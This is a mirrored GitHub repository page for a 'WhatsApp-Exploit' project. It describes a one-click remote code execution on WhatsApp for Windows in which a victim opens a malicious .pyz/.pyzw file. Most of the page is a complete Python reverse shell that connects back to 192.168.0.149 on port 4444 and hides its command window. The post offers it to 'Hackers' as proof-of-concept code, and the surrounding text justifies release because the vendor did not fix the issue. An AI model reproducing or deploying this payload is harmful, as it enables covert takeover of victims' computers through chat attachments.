Giters

chilumine / WhatsApp-Exploit

1-Click RCE via WhatsApp For Windows

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

WhatsApp’s “One-Click” Security Flaw: How to Exploit It

Hello Hackers,

WhatsApp is clearly doing an outstanding job with their security so much so that they’re not worried about minor flaws. For example, I reported a flaw that lets attackers get into your system just by clicking "Open" on a malicious file. You’d think this would be a big issue, but WhatsApp seems to think it’s no big deal.

When I pointed this out, they didn’t seem too concerned. Instead of fixing the issue, they were more focused on other things. And in a stunning display of security priorities, BleepingComputer revealed that WhatsApp has no plans to block Python scripts. Because of course Python scripts are totally harmless and not worth worrying about!

So, I think it’s absolutely fine to share PoC codes, which are really very simple. Here’s an example of a reverse shell code, which can be saved with a .pyz or .pyzw extension—Pythonic Zip files that work just like regular zip files but can also be executed directly. Python can import modules from these zip files just like from a subdirectory.

Note: Defense evasion techniques are out of scope for this example.

Here is a video PoC: 2

For more details on the security gap, check out this BleepingComputer post.

Example: Reverse Shell on IP 192.168.0.149 on Port 4444

import os
import socket
import subprocess
import threading

def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.149", 4444))

# Set up startupinfo to hide the command prompt window
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE

p = subprocess.Popen(
    ["cmd"],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    stdin=subprocess.PIPE,
    startupinfo=startupinfo
)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

About

1-Click RCE via WhatsApp For Windows